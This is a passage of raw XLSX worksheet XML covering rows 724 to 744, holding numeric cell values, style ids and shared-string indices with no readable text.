      <c r="N724" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O724" s="29">
        <v>4.0</v>
      </c>
      <c r="P724" s="29">
        <v>1.0</v>
      </c>
      <c r="Q724" s="15"/>
      <c r="R724" s="15"/>
      <c r="S724" s="15"/>
      <c r="T724" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U724" s="5"/>
      <c r="V724" s="5"/>
      <c r="W724" s="47"/>
      <c r="X724" s="45"/>
      <c r="Y724" s="45"/>
      <c r="Z724" s="38" t="s">
        <v>3172</v>
      </c>
      <c r="AA724" s="39" t="s">
        <v>3173</v>
      </c>
      <c r="AB724" s="38" t="s">
        <v>3174</v>
      </c>
      <c r="AC724" s="40">
        <v>251745.0</v>
      </c>
      <c r="AD724" s="5"/>
      <c r="AE724" s="14"/>
      <c r="AF724" s="14"/>
    </row>
    <row r="725">
      <c r="A725" s="6">
        <f t="shared" si="1"/>
        <v>0.3974019542</v>
      </c>
      <c r="B725" s="29">
        <v>1.0</v>
      </c>
      <c r="C725" s="15"/>
      <c r="D725" s="14"/>
      <c r="E725" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F725" s="14"/>
      <c r="G725" s="29">
        <v>0.0</v>
      </c>
      <c r="H725" s="29">
        <v>467.0</v>
      </c>
      <c r="I725" s="29">
        <v>270298.0</v>
      </c>
      <c r="J725" s="15"/>
      <c r="K725" s="15"/>
      <c r="L725" s="15"/>
      <c r="M725" s="14"/>
      <c r="N725" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O725" s="29">
        <v>1.0</v>
      </c>
      <c r="P725" s="29">
        <v>4.0</v>
      </c>
      <c r="Q725" s="15"/>
      <c r="R725" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S725" s="15"/>
      <c r="T725" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U725" s="5"/>
      <c r="V725" s="5"/>
      <c r="W725" s="47"/>
      <c r="X725" s="45"/>
      <c r="Y725" s="45"/>
      <c r="Z725" s="38" t="s">
        <v>3175</v>
      </c>
      <c r="AA725" s="39" t="s">
        <v>3176</v>
      </c>
      <c r="AB725" s="38" t="s">
        <v>3177</v>
      </c>
      <c r="AC725" s="40">
        <v>257264.0</v>
      </c>
      <c r="AD725" s="5"/>
      <c r="AE725" s="14"/>
      <c r="AF725" s="14"/>
    </row>
    <row r="726">
      <c r="A726" s="6">
        <f t="shared" si="1"/>
        <v>0.1263225396</v>
      </c>
      <c r="B726" s="29">
        <v>1.0</v>
      </c>
      <c r="C726" s="29">
        <v>143314.0</v>
      </c>
      <c r="D726" s="14"/>
      <c r="E726" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F726" s="14"/>
      <c r="G726" s="29">
        <v>6.0</v>
      </c>
      <c r="H726" s="29">
        <v>295.0</v>
      </c>
      <c r="I726" s="29">
        <v>41620.0</v>
      </c>
      <c r="J726" s="15"/>
      <c r="K726" s="29">
        <v>6253.0</v>
      </c>
      <c r="L726" s="15"/>
      <c r="M726" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N726" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O726" s="29">
        <v>1.0</v>
      </c>
      <c r="P726" s="29">
        <v>1.0</v>
      </c>
      <c r="Q726" s="15"/>
      <c r="R726" s="15"/>
      <c r="S726" s="15"/>
      <c r="T726" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U726" s="5"/>
      <c r="V726" s="5"/>
      <c r="W726" s="47"/>
      <c r="X726" s="45"/>
      <c r="Y726" s="45"/>
      <c r="Z726" s="38" t="s">
        <v>3178</v>
      </c>
      <c r="AA726" s="39" t="s">
        <v>3179</v>
      </c>
      <c r="AB726" s="38" t="s">
        <v>3180</v>
      </c>
      <c r="AC726" s="40">
        <v>142282.0</v>
      </c>
      <c r="AD726" s="5"/>
      <c r="AE726" s="14"/>
      <c r="AF726" s="14"/>
    </row>
    <row r="727">
      <c r="A727" s="6">
        <f t="shared" si="1"/>
        <v>0.9945765975</v>
      </c>
      <c r="B727" s="29">
        <v>1.0</v>
      </c>
      <c r="C727" s="29">
        <v>199051.0</v>
      </c>
      <c r="D727" s="14"/>
      <c r="E727" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F727" s="14"/>
      <c r="G727" s="29">
        <v>4.0</v>
      </c>
      <c r="H727" s="29">
        <v>847.0</v>
      </c>
      <c r="I727" s="29">
        <v>131089.0</v>
      </c>
      <c r="J727" s="15"/>
      <c r="K727" s="29">
        <v>131089.0</v>
      </c>
      <c r="L727" s="15"/>
      <c r="M727" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N727" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O727" s="29">
        <v>5.0</v>
      </c>
      <c r="P727" s="29">
        <v>3.0</v>
      </c>
      <c r="Q727" s="15"/>
      <c r="R727" s="15"/>
      <c r="S727" s="15"/>
      <c r="T727" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U727" s="5"/>
      <c r="V727" s="5"/>
      <c r="W727" s="47"/>
      <c r="X727" s="45"/>
      <c r="Y727" s="45"/>
      <c r="Z727" s="38" t="s">
        <v>3181</v>
      </c>
      <c r="AA727" s="39" t="s">
        <v>3182</v>
      </c>
      <c r="AB727" s="38" t="s">
        <v>3183</v>
      </c>
      <c r="AC727" s="40">
        <v>199037.0</v>
      </c>
      <c r="AD727" s="5"/>
      <c r="AE727" s="14"/>
      <c r="AF727" s="14"/>
    </row>
    <row r="728">
      <c r="A728" s="6">
        <f t="shared" si="1"/>
        <v>0.9368207318</v>
      </c>
      <c r="B728" s="29">
        <v>1.0</v>
      </c>
      <c r="C728" s="29">
        <v>44976.0</v>
      </c>
      <c r="D728" s="14"/>
      <c r="E728" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F728" s="14"/>
      <c r="G728" s="29">
        <v>39.0</v>
      </c>
      <c r="H728" s="29">
        <v>9919.0</v>
      </c>
      <c r="I728" s="29">
        <v>414.0</v>
      </c>
      <c r="J728" s="15"/>
      <c r="K728" s="29">
        <v>-1.0</v>
      </c>
      <c r="L728" s="15"/>
      <c r="M728" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N728" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O728" s="29">
        <v>5.0</v>
      </c>
      <c r="P728" s="29">
        <v>4.0</v>
      </c>
      <c r="Q728" s="15"/>
      <c r="R728" s="15"/>
      <c r="S728" s="15"/>
      <c r="T728" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U728" s="5"/>
      <c r="V728" s="5"/>
      <c r="W728" s="47"/>
      <c r="X728" s="45"/>
      <c r="Y728" s="45"/>
      <c r="Z728" s="38" t="s">
        <v>3184</v>
      </c>
      <c r="AA728" s="39" t="s">
        <v>3185</v>
      </c>
      <c r="AB728" s="38" t="s">
        <v>3186</v>
      </c>
      <c r="AC728" s="40">
        <v>44849.0</v>
      </c>
      <c r="AD728" s="5"/>
      <c r="AE728" s="14"/>
      <c r="AF728" s="14"/>
    </row>
    <row r="729">
      <c r="A729" s="6">
        <f t="shared" si="1"/>
        <v>0.808250337</v>
      </c>
      <c r="B729" s="29">
        <v>1.0</v>
      </c>
      <c r="C729" s="29">
        <v>89373.0</v>
      </c>
      <c r="D729" s="14"/>
      <c r="E729" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F729" s="14"/>
      <c r="G729" s="29">
        <v>4.0</v>
      </c>
      <c r="H729" s="29">
        <v>3226.0</v>
      </c>
      <c r="I729" s="29">
        <v>67483.0</v>
      </c>
      <c r="J729" s="15"/>
      <c r="K729" s="15"/>
      <c r="L729" s="15"/>
      <c r="M729" s="14"/>
      <c r="N729" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O729" s="29">
        <v>3.0</v>
      </c>
      <c r="P729" s="29">
        <v>2.0</v>
      </c>
      <c r="Q729" s="15"/>
      <c r="R729" s="15"/>
      <c r="S729" s="15"/>
      <c r="T729" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U729" s="5"/>
      <c r="V729" s="5"/>
      <c r="W729" s="47"/>
      <c r="X729" s="45"/>
      <c r="Y729" s="45"/>
      <c r="Z729" s="38" t="s">
        <v>3187</v>
      </c>
      <c r="AA729" s="39" t="s">
        <v>3188</v>
      </c>
      <c r="AB729" s="38" t="s">
        <v>3189</v>
      </c>
      <c r="AC729" s="40">
        <v>89369.0</v>
      </c>
      <c r="AD729" s="5"/>
      <c r="AE729" s="14"/>
      <c r="AF729" s="14"/>
    </row>
    <row r="730">
      <c r="A730" s="6">
        <f t="shared" si="1"/>
        <v>0.2992704184</v>
      </c>
      <c r="B730" s="29">
        <v>1.0</v>
      </c>
      <c r="C730" s="29">
        <v>171919.0</v>
      </c>
      <c r="D730" s="14"/>
      <c r="E730" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F730" s="14"/>
      <c r="G730" s="29">
        <v>5.0</v>
      </c>
      <c r="H730" s="29">
        <v>2962.0</v>
      </c>
      <c r="I730" s="29">
        <v>150188.0</v>
      </c>
      <c r="J730" s="15"/>
      <c r="K730" s="29">
        <v>150188.0</v>
      </c>
      <c r="L730" s="15"/>
      <c r="M730" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N730" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O730" s="29">
        <v>2.0</v>
      </c>
      <c r="P730" s="29">
        <v>0.0</v>
      </c>
      <c r="Q730" s="15"/>
      <c r="R730" s="15"/>
      <c r="S730" s="15"/>
      <c r="T730" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U730" s="5"/>
      <c r="V730" s="5"/>
      <c r="W730" s="47"/>
      <c r="X730" s="45"/>
      <c r="Y730" s="45"/>
      <c r="Z730" s="38" t="s">
        <v>3190</v>
      </c>
      <c r="AA730" s="39" t="s">
        <v>3191</v>
      </c>
      <c r="AB730" s="38" t="s">
        <v>3192</v>
      </c>
      <c r="AC730" s="40">
        <v>171748.0</v>
      </c>
      <c r="AD730" s="5"/>
      <c r="AE730" s="14"/>
      <c r="AF730" s="14"/>
    </row>
    <row r="731">
      <c r="A731" s="6">
        <f t="shared" si="1"/>
        <v>0.3033626293</v>
      </c>
      <c r="B731" s="29">
        <v>1.0</v>
      </c>
      <c r="C731" s="29">
        <v>210057.0</v>
      </c>
      <c r="D731" s="14"/>
      <c r="E731" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F731" s="14"/>
      <c r="G731" s="29">
        <v>98.0</v>
      </c>
      <c r="H731" s="29">
        <v>57058.0</v>
      </c>
      <c r="I731" s="29">
        <v>207781.0</v>
      </c>
      <c r="J731" s="15"/>
      <c r="K731" s="29">
        <v>83382.0</v>
      </c>
      <c r="L731" s="15"/>
      <c r="M731" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N731" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O731" s="29">
        <v>6.0</v>
      </c>
      <c r="P731" s="29">
        <v>16.0</v>
      </c>
      <c r="Q731" s="15"/>
      <c r="R731" s="15"/>
      <c r="S731" s="15"/>
      <c r="T731" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U731" s="5"/>
      <c r="V731" s="5"/>
      <c r="W731" s="47"/>
      <c r="X731" s="45"/>
      <c r="Y731" s="45"/>
      <c r="Z731" s="38" t="s">
        <v>3193</v>
      </c>
      <c r="AA731" s="39" t="s">
        <v>3194</v>
      </c>
      <c r="AB731" s="38" t="s">
        <v>3195</v>
      </c>
      <c r="AC731" s="40">
        <v>210045.0</v>
      </c>
      <c r="AD731" s="5"/>
      <c r="AE731" s="14"/>
      <c r="AF731" s="14"/>
    </row>
    <row r="732">
      <c r="A732" s="6">
        <f t="shared" si="1"/>
        <v>0.2220003744</v>
      </c>
      <c r="B732" s="29">
        <v>1.0</v>
      </c>
      <c r="C732" s="15"/>
      <c r="D732" s="14"/>
      <c r="E732" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F732" s="14"/>
      <c r="G732" s="29">
        <v>4.0</v>
      </c>
      <c r="H732" s="29">
        <v>2879.0</v>
      </c>
      <c r="I732" s="29">
        <v>95611.0</v>
      </c>
      <c r="J732" s="15"/>
      <c r="K732" s="29">
        <v>98538.0</v>
      </c>
      <c r="L732" s="15"/>
      <c r="M732" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N732" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O732" s="29">
        <v>1.0</v>
      </c>
      <c r="P732" s="29">
        <v>6.0</v>
      </c>
      <c r="Q732" s="15"/>
      <c r="R732" s="15"/>
      <c r="S732" s="15"/>
      <c r="T732" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U732" s="5"/>
      <c r="V732" s="5"/>
      <c r="W732" s="47"/>
      <c r="X732" s="45"/>
      <c r="Y732" s="45"/>
      <c r="Z732" s="38" t="s">
        <v>3196</v>
      </c>
      <c r="AA732" s="39" t="s">
        <v>3197</v>
      </c>
      <c r="AB732" s="38" t="s">
        <v>3198</v>
      </c>
      <c r="AC732" s="40">
        <v>122748.0</v>
      </c>
      <c r="AD732" s="5"/>
      <c r="AE732" s="14"/>
      <c r="AF732" s="14"/>
    </row>
    <row r="733">
      <c r="A733" s="6">
        <f t="shared" si="1"/>
        <v>0.04314893166</v>
      </c>
      <c r="B733" s="29">
        <v>1.0</v>
      </c>
      <c r="C733" s="14"/>
      <c r="D733" s="14"/>
      <c r="E733" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F733" s="14"/>
      <c r="G733" s="29">
        <v>0.0</v>
      </c>
      <c r="H733" s="29">
        <v>47.0</v>
      </c>
      <c r="I733" s="29">
        <v>261154.0</v>
      </c>
      <c r="J733" s="15"/>
      <c r="K733" s="29">
        <v>6253.0</v>
      </c>
      <c r="L733" s="15"/>
      <c r="M733" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N733" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O733" s="29">
        <v>0.0</v>
      </c>
      <c r="P733" s="29">
        <v>4.0</v>
      </c>
      <c r="Q733" s="15"/>
      <c r="R733" s="15"/>
      <c r="S733" s="15"/>
      <c r="T733" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U733" s="5"/>
      <c r="V733" s="5"/>
      <c r="W733" s="47"/>
      <c r="X733" s="45"/>
      <c r="Y733" s="45"/>
      <c r="Z733" s="38" t="s">
        <v>3199</v>
      </c>
      <c r="AA733" s="39" t="s">
        <v>3200</v>
      </c>
      <c r="AB733" s="38" t="s">
        <v>3201</v>
      </c>
      <c r="AC733" s="40">
        <v>270622.0</v>
      </c>
      <c r="AD733" s="5"/>
      <c r="AE733" s="14"/>
      <c r="AF733" s="14"/>
    </row>
    <row r="734">
      <c r="A734" s="6">
        <f t="shared" si="1"/>
        <v>0.5297707976</v>
      </c>
      <c r="B734" s="29">
        <v>1.0</v>
      </c>
      <c r="C734" s="29">
        <v>65144.0</v>
      </c>
      <c r="D734" s="14"/>
      <c r="E734" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F734" s="14"/>
      <c r="G734" s="29">
        <v>1.0</v>
      </c>
      <c r="H734" s="29">
        <v>215.0</v>
      </c>
      <c r="I734" s="29">
        <v>5169.0</v>
      </c>
      <c r="J734" s="15"/>
      <c r="K734" s="15"/>
      <c r="L734" s="15"/>
      <c r="M734" s="15"/>
      <c r="N734" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O734" s="29">
        <v>3.0</v>
      </c>
      <c r="P734" s="29">
        <v>0.0</v>
      </c>
      <c r="Q734" s="15"/>
      <c r="R734" s="15"/>
      <c r="S734" s="15"/>
      <c r="T734" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U734" s="5"/>
      <c r="V734" s="5"/>
      <c r="W734" s="47"/>
      <c r="X734" s="45"/>
      <c r="Y734" s="45"/>
      <c r="Z734" s="38" t="s">
        <v>3202</v>
      </c>
      <c r="AA734" s="39" t="s">
        <v>3203</v>
      </c>
      <c r="AB734" s="38" t="s">
        <v>2997</v>
      </c>
      <c r="AC734" s="40">
        <v>65140.0</v>
      </c>
      <c r="AD734" s="5"/>
      <c r="AE734" s="14"/>
      <c r="AF734" s="14"/>
    </row>
    <row r="735">
      <c r="A735" s="6">
        <f t="shared" si="1"/>
        <v>0.3856181499</v>
      </c>
      <c r="B735" s="29">
        <v>1.0</v>
      </c>
      <c r="C735" s="29">
        <v>241299.0</v>
      </c>
      <c r="D735" s="14"/>
      <c r="E735" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F735" s="14"/>
      <c r="G735" s="29">
        <v>10.0</v>
      </c>
      <c r="H735" s="29">
        <v>22566.0</v>
      </c>
      <c r="I735" s="29">
        <v>200059.0</v>
      </c>
      <c r="J735" s="15"/>
      <c r="K735" s="29">
        <v>200059.0</v>
      </c>
      <c r="L735" s="15"/>
      <c r="M735" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N735" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O735" s="29">
        <v>1.0</v>
      </c>
      <c r="P735" s="29">
        <v>0.0</v>
      </c>
      <c r="Q735" s="15"/>
      <c r="R735" s="15"/>
      <c r="S735" s="15"/>
      <c r="T735" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U735" s="5"/>
      <c r="V735" s="5"/>
      <c r="W735" s="47"/>
      <c r="X735" s="45"/>
      <c r="Y735" s="45"/>
      <c r="Z735" s="38" t="s">
        <v>3204</v>
      </c>
      <c r="AA735" s="39" t="s">
        <v>3205</v>
      </c>
      <c r="AB735" s="38" t="s">
        <v>1991</v>
      </c>
      <c r="AC735" s="40">
        <v>241263.0</v>
      </c>
      <c r="AD735" s="5"/>
      <c r="AE735" s="14"/>
      <c r="AF735" s="14"/>
    </row>
    <row r="736">
      <c r="A736" s="6">
        <f t="shared" si="1"/>
        <v>0.1074971418</v>
      </c>
      <c r="B736" s="29">
        <v>1.0</v>
      </c>
      <c r="C736" s="15"/>
      <c r="D736" s="14"/>
      <c r="E736" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F736" s="14"/>
      <c r="G736" s="29">
        <v>37.0</v>
      </c>
      <c r="H736" s="29">
        <v>20618.0</v>
      </c>
      <c r="I736" s="29">
        <v>270519.0</v>
      </c>
      <c r="J736" s="15"/>
      <c r="K736" s="29">
        <v>270519.0</v>
      </c>
      <c r="L736" s="15"/>
      <c r="M736" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N736" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O736" s="29">
        <v>2.0</v>
      </c>
      <c r="P736" s="29">
        <v>11.0</v>
      </c>
      <c r="Q736" s="15"/>
      <c r="R736" s="15"/>
      <c r="S736" s="15"/>
      <c r="T736" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U736" s="5"/>
      <c r="V736" s="5"/>
      <c r="W736" s="47"/>
      <c r="X736" s="45"/>
      <c r="Y736" s="45"/>
      <c r="Z736" s="38" t="s">
        <v>3206</v>
      </c>
      <c r="AA736" s="39" t="s">
        <v>3207</v>
      </c>
      <c r="AB736" s="38" t="s">
        <v>3208</v>
      </c>
      <c r="AC736" s="40">
        <v>257417.0</v>
      </c>
      <c r="AD736" s="5"/>
      <c r="AE736" s="14"/>
      <c r="AF736" s="14"/>
    </row>
    <row r="737">
      <c r="A737" s="6">
        <f t="shared" si="1"/>
        <v>0.7480801337</v>
      </c>
      <c r="B737" s="29">
        <v>1.0</v>
      </c>
      <c r="C737" s="29">
        <v>181956.0</v>
      </c>
      <c r="D737" s="14"/>
      <c r="E737" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F737" s="14"/>
      <c r="G737" s="29">
        <v>1.0</v>
      </c>
      <c r="H737" s="29">
        <v>884.0</v>
      </c>
      <c r="I737" s="29">
        <v>112379.0</v>
      </c>
      <c r="J737" s="15"/>
      <c r="K737" s="15"/>
      <c r="L737" s="15"/>
      <c r="M737" s="14"/>
      <c r="N737" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O737" s="29">
        <v>2.0</v>
      </c>
      <c r="P737" s="29">
        <v>6.0</v>
      </c>
      <c r="Q737" s="15"/>
      <c r="R737" s="15"/>
      <c r="S737" s="15"/>
      <c r="T737" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U737" s="5"/>
      <c r="V737" s="5"/>
      <c r="W737" s="47"/>
      <c r="X737" s="45"/>
      <c r="Y737" s="45"/>
      <c r="Z737" s="38" t="s">
        <v>3209</v>
      </c>
      <c r="AA737" s="39" t="s">
        <v>3210</v>
      </c>
      <c r="AB737" s="38" t="s">
        <v>3211</v>
      </c>
      <c r="AC737" s="40">
        <v>181748.0</v>
      </c>
      <c r="AD737" s="5"/>
      <c r="AE737" s="14"/>
      <c r="AF737" s="14"/>
    </row>
    <row r="738">
      <c r="A738" s="6">
        <f t="shared" si="1"/>
        <v>0.5901323821</v>
      </c>
      <c r="B738" s="29">
        <v>1.0</v>
      </c>
      <c r="C738" s="14"/>
      <c r="D738" s="14"/>
      <c r="E738" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F738" s="14"/>
      <c r="G738" s="29">
        <v>0.0</v>
      </c>
      <c r="H738" s="29">
        <v>294.0</v>
      </c>
      <c r="I738" s="29">
        <v>122449.0</v>
      </c>
      <c r="J738" s="15"/>
      <c r="K738" s="29">
        <v>122449.0</v>
      </c>
      <c r="L738" s="15"/>
      <c r="M738" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N738" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O738" s="29">
        <v>1.0</v>
      </c>
      <c r="P738" s="29">
        <v>7.0</v>
      </c>
      <c r="Q738" s="15"/>
      <c r="R738" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S738" s="15"/>
      <c r="T738" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U738" s="5"/>
      <c r="V738" s="5"/>
      <c r="W738" s="47"/>
      <c r="X738" s="45"/>
      <c r="Y738" s="45"/>
      <c r="Z738" s="38" t="s">
        <v>3212</v>
      </c>
      <c r="AA738" s="39" t="s">
        <v>3213</v>
      </c>
      <c r="AB738" s="38" t="s">
        <v>1296</v>
      </c>
      <c r="AC738" s="40">
        <v>170287.0</v>
      </c>
      <c r="AD738" s="5"/>
      <c r="AE738" s="14"/>
      <c r="AF738" s="14"/>
    </row>
    <row r="739">
      <c r="A739" s="6">
        <f t="shared" si="1"/>
        <v>0.2273051459</v>
      </c>
      <c r="B739" s="29">
        <v>1.0</v>
      </c>
      <c r="C739" s="29">
        <v>237307.0</v>
      </c>
      <c r="D739" s="14"/>
      <c r="E739" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F739" s="14"/>
      <c r="G739" s="29">
        <v>51.0</v>
      </c>
      <c r="H739" s="29">
        <v>10020.0</v>
      </c>
      <c r="I739" s="29">
        <v>157376.0</v>
      </c>
      <c r="J739" s="15"/>
      <c r="K739" s="15"/>
      <c r="L739" s="15"/>
      <c r="M739" s="15"/>
      <c r="N739" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O739" s="29">
        <v>5.0</v>
      </c>
      <c r="P739" s="29">
        <v>3.0</v>
      </c>
      <c r="Q739" s="15"/>
      <c r="R739" s="15"/>
      <c r="S739" s="15"/>
      <c r="T739" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U739" s="5"/>
      <c r="V739" s="5"/>
      <c r="W739" s="47"/>
      <c r="X739" s="45"/>
      <c r="Y739" s="45"/>
      <c r="Z739" s="38" t="s">
        <v>3214</v>
      </c>
      <c r="AA739" s="39" t="s">
        <v>3215</v>
      </c>
      <c r="AB739" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC739" s="40">
        <v>237298.0</v>
      </c>
      <c r="AD739" s="5"/>
      <c r="AE739" s="14"/>
      <c r="AF739" s="14"/>
    </row>
    <row r="740">
      <c r="A740" s="6">
        <f t="shared" si="1"/>
        <v>0.9064321596</v>
      </c>
      <c r="B740" s="29">
        <v>1.0</v>
      </c>
      <c r="C740" s="29">
        <v>19079.0</v>
      </c>
      <c r="D740" s="14"/>
      <c r="E740" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F740" s="14"/>
      <c r="G740" s="29">
        <v>0.0</v>
      </c>
      <c r="H740" s="29">
        <v>268.0</v>
      </c>
      <c r="I740" s="29">
        <v>11679.0</v>
      </c>
      <c r="J740" s="15"/>
      <c r="K740" s="29">
        <v>5400.0</v>
      </c>
      <c r="L740" s="15"/>
      <c r="M740" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N740" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O740" s="29">
        <v>4.0</v>
      </c>
      <c r="P740" s="29">
        <v>5.0</v>
      </c>
      <c r="Q740" s="15"/>
      <c r="R740" s="15"/>
      <c r="S740" s="15"/>
      <c r="T740" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U740" s="5"/>
      <c r="V740" s="5"/>
      <c r="W740" s="47"/>
      <c r="X740" s="45"/>
      <c r="Y740" s="45"/>
      <c r="Z740" s="38" t="s">
        <v>3216</v>
      </c>
      <c r="AA740" s="39" t="s">
        <v>3217</v>
      </c>
      <c r="AB740" s="38" t="s">
        <v>3218</v>
      </c>
      <c r="AC740" s="40">
        <v>19078.0</v>
      </c>
      <c r="AD740" s="5"/>
      <c r="AE740" s="14"/>
      <c r="AF740" s="14"/>
    </row>
    <row r="741">
      <c r="A741" s="6">
        <f t="shared" si="1"/>
        <v>0.6614253775</v>
      </c>
      <c r="B741" s="29">
        <v>1.0</v>
      </c>
      <c r="C741" s="14"/>
      <c r="D741" s="14"/>
      <c r="E741" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F741" s="14"/>
      <c r="G741" s="29">
        <v>1.0</v>
      </c>
      <c r="H741" s="29">
        <v>987.0</v>
      </c>
      <c r="I741" s="29">
        <v>35231.0</v>
      </c>
      <c r="J741" s="15"/>
      <c r="K741" s="15"/>
      <c r="L741" s="15"/>
      <c r="M741" s="14"/>
      <c r="N741" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O741" s="29">
        <v>1.0</v>
      </c>
      <c r="P741" s="29">
        <v>6.0</v>
      </c>
      <c r="Q741" s="15"/>
      <c r="R741" s="15"/>
      <c r="S741" s="15"/>
      <c r="T741" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U741" s="5"/>
      <c r="V741" s="5"/>
      <c r="W741" s="47"/>
      <c r="X741" s="45"/>
      <c r="Y741" s="45"/>
      <c r="Z741" s="38" t="s">
        <v>3219</v>
      </c>
      <c r="AA741" s="39" t="s">
        <v>3220</v>
      </c>
      <c r="AB741" s="38" t="s">
        <v>3221</v>
      </c>
      <c r="AC741" s="40">
        <v>53162.0</v>
      </c>
      <c r="AD741" s="5"/>
      <c r="AE741" s="14"/>
      <c r="AF741" s="14"/>
    </row>
    <row r="742">
      <c r="A742" s="6">
        <f t="shared" si="1"/>
        <v>0.6581533629</v>
      </c>
      <c r="B742" s="29">
        <v>1.0</v>
      </c>
      <c r="C742" s="15"/>
      <c r="D742" s="14"/>
      <c r="E742" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F742" s="14"/>
      <c r="G742" s="29">
        <v>0.0</v>
      </c>
      <c r="H742" s="29">
        <v>150.0</v>
      </c>
      <c r="I742" s="29">
        <v>97418.0</v>
      </c>
      <c r="J742" s="15"/>
      <c r="K742" s="15"/>
      <c r="L742" s="15"/>
      <c r="M742" s="14"/>
      <c r="N742" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O742" s="29">
        <v>1.0</v>
      </c>
      <c r="P742" s="29">
        <v>2.0</v>
      </c>
      <c r="Q742" s="15"/>
      <c r="R742" s="15"/>
      <c r="S742" s="15"/>
      <c r="T742" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U742" s="5"/>
      <c r="V742" s="5"/>
      <c r="W742" s="47"/>
      <c r="X742" s="45"/>
      <c r="Y742" s="45"/>
      <c r="Z742" s="38" t="s">
        <v>3222</v>
      </c>
      <c r="AA742" s="39" t="s">
        <v>3223</v>
      </c>
      <c r="AB742" s="38" t="s">
        <v>3224</v>
      </c>
      <c r="AC742" s="40">
        <v>126961.0</v>
      </c>
      <c r="AD742" s="5"/>
      <c r="AE742" s="14"/>
      <c r="AF742" s="14"/>
    </row>
    <row r="743">
      <c r="A743" s="6">
        <f t="shared" si="1"/>
        <v>0.4655406171</v>
      </c>
      <c r="B743" s="29">
        <v>1.0</v>
      </c>
      <c r="C743" s="15"/>
      <c r="D743" s="14"/>
      <c r="E743" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F743" s="14"/>
      <c r="G743" s="29">
        <v>2.0</v>
      </c>
      <c r="H743" s="29">
        <v>134.0</v>
      </c>
      <c r="I743" s="29">
        <v>189075.0</v>
      </c>
      <c r="J743" s="15"/>
      <c r="K743" s="15"/>
      <c r="L743" s="15"/>
      <c r="M743" s="15"/>
      <c r="N743" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O743" s="29">
        <v>0.0</v>
      </c>
      <c r="P743" s="29">
        <v>2.0</v>
      </c>
      <c r="Q743" s="15"/>
      <c r="R743" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S743" s="15"/>
      <c r="T743" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U743" s="5"/>
      <c r="V743" s="5"/>
      <c r="W743" s="47"/>
      <c r="X743" s="45"/>
      <c r="Y743" s="45"/>
      <c r="Z743" s="38" t="s">
        <v>3225</v>
      </c>
      <c r="AA743" s="39" t="s">
        <v>3226</v>
      </c>
      <c r="AB743" s="38" t="s">
        <v>3227</v>
      </c>
      <c r="AC743" s="40">
        <v>195870.0</v>
      </c>
      <c r="AD743" s="5"/>
      <c r="AE743" s="14"/>
      <c r="AF743" s="14"/>
    </row>
    <row r="744">
      <c r="A744" s="6">
        <f t="shared" si="1"/>
        <v>0.5156116619</v>
      </c>
      <c r="B744" s="29">
        <v>1.0</v>
      </c>
